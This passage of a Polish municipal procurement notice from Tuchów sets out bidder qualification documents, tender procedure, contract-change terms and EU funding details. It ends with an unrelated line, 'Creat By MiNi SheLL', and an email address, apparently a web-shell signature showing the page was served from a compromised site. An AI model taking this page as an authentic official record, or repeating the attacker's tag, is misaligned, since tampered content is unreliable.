<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W  zakresie  wymaganej  sytuacji  ekonomicznej  i  finansowej  - Zamawiający  wymaga, aby  wykonawca  był  ubezpieczony  od  odpowiedzialności  cywilnej  w  zakresie  prowadzonej  działalności  gospodarczej  na  kwotę nie mniejszą       niż  6 000 000 ,00   PLN, oraz  że  znajduje  się  w  dobrej  sytuacji  finansowej  i  ekonomicznej. 

Ocena tego warunku zostanie dokonana  na  podstawie:

opłaconej polisy, a w przypadku  jej  braku  innego  dokumentu  potwierdzającego, że  wykonawca  jest  ubezpieczony  od  odpowiedzialności  cywilnej  w  zakresie  prowadzonej  działalności  związanej  z  przedmiotem  zamówienia
oświadczenia, że wykonawca znajduje się w dobrej kondycji finansowej i ekonomicznej, złożonego w dokumencie  o nazwie oświadczenie - załącznik nr 2  SIWZ. Wykonawcy  wspólnie  ubiegający  się  o  udzielenie  zamówienia  muszą  wykazać, że  wspólnie  spełniają  powyższy  warunek.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Nie dotyczy</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający  przewiduje  możliwość  wprowadzenia  zmian  do  zawartej  umowy  w  stosunku  do  treści  oferty   w następujących  okolicznościach:
1.Konieczności  wykonania  robót  budowlanych  w  przypadku:
a/ wystąpieniem  w  trakcie  realizacji  niniejszej  umowy  konieczności  wykonania  robót  dodatkowych, nie  objętych  zamówieniem  podstawowym, których  wykonanie  stanie  się  konieczne  na  skutek  sytuacji  niemożliwej  wcześniej  do  przewidzenia, a  wykonanie  zamówienia  podstawowego  będzie  uzależnione  od  wykonania  zamówienia  dodatkowego.
b/ działaniem  zdarzeń  losowych
c/. niekorzystnymi  warunkami  atmosferycznymi  uniemożliwiającymi  przeprowadzenie  w  terminie  ustalonych robót  budowlanych
d/. gdy  w  wyniku  rozliczenia    udzielonej  dotacji   i  wynikającym  stąd  ostatecznym  terminem rozliczenia              nie  jest  możliwe  dotrzymanie  umownego  terminu  wykonania  umowy

2.Zmniejszenia  zakresu  umownego  robót  z  przyczyn  technicznych  lub  gospodarczych  niemożliwych  wcześniej do  przewidzenia  przez  Zamawiającego
3.Zmniejszenia  wysokości  wynagrodzenia   przewidzianego  w  umowie, spowodowanego  koniecznością zmniejszenia  zakresu  umownego  robót.
4.W przypadku konieczności wykonania robót dodatkowych , nie objętych zamówieniem podstawowym a których wykonanie stało się konieczne na skutek sytuacji niemożliwej wcześniej do przewidzenia ,zamawiajacy może udzielić zamówienia dodatkowego  na podst.art 67 ust 1 pkt 5 ustawy Prawo zamówień publicznych.
Zamówienie dodatkowe  może być udzielone tylko po zaakceptowaniu przez Zamawiajacego i inspektora nadzoru protokołu</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.tuchow.BIP Tuchow//Zamówienia  publiczne+ogłoszenia/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Tuchowie ,33-170 Tuchów ,ul.Jana Pawła II 4,pokój nr 24 .Cena  materiałów  przetargowych  wynosi 100,00 złotych wersja papierowa u Zamawiającego.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.01.2012 godzina 10:00, miejsce: Urząd Miejski w Tuchowie ,ul.Rynek 1 ,pokój nr 7 -Dziennik podawczy.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Niniejszy projekt realizowany jest w oparciu o umowę 
o przyznanie pomocy nr :MRPO.04.03.01-12-013/11-00-XVI/84/FE/11  w ramach Małopolskiego Regionalnego Programu Operacyjnego na lata 2007-2013 ,Oś Priorytetowa 4.I nfrastruktura dla rozwoju gospodarczego Działanie 4.3. Tworzenie i rozwój stref aktywności gospodarczej ,Schemat A :Strefy aktywności gospodarczej o powierzchni 2-20 ha  z Europejskiego Funduszu Rozwoju Regionalnego  ..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com